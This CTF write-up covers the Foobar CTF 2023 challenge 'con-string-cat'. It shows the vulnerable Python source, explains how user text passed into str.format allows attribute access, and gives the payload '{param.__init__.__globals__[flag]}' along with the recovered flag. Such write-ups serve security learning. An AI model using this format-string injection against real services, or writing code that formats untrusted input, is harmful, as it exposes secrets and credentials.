ctf-writeup/Foobar CTF 2023/con-string-cat
daffainfo 9325852d3a feat: added TSG CTF 2023 2023-11-05 15:59:14 +07:00
..
images feat: added 4 CTFs writeup 2023-03-13 07:45:03 +07:00
README.md feat: added TSG CTF 2023 2023-11-05 15:59:14 +07:00
chall.py feat: added 4 CTFs writeup 2023-03-13 07:45:03 +07:00

README.md

con-string-cat

attach.......to get universe

About the Challenge

We were given a server to connect and the source code

nc chall.foobar.nitdgplug.org 30011

And here is the source code (You can get the source code here)

flag = open('flag.txt').read()

class foobar:
    def __init__(self, uname):
        self.uname = uname

    def display(self):
        print(self.uname)

foo = foobar("welcome_to_foobarctf")

def resolver(template, resolv):
    return template.format(param = resolv)

text = "This is for u :) {param}"

offset = int(input("enter the offset: "))
string_to_insert = input("enter string to insert: ")

if offset > len(text):
    print("invalid input")
else:
    text = text[0:offset] + string_to_insert + text[offset:]
    print(resolver(text, foo))

When we run the program, we need to input 2 things, the offset and the string. For example if I input 1 and the string is daffainfo:

preview

How to Solve?

After doing some research about format in python, I found there is 1 vulnerability that can happen by using format. We can access attribute object using str.format (You can check the reference here)

So, I input 24 as offset (You can input anything from 1 - 25, but I prefer 24 so we can read the flag easilty) And I input this as the string

{param.__init__.__globals__[flag]}

So, I tried to access the flag variable from the global namespace of the __init__ function's module, using the __globals__ attribute of the function.

flag

GLUG{7h3_Univ3r$@l_fl@g}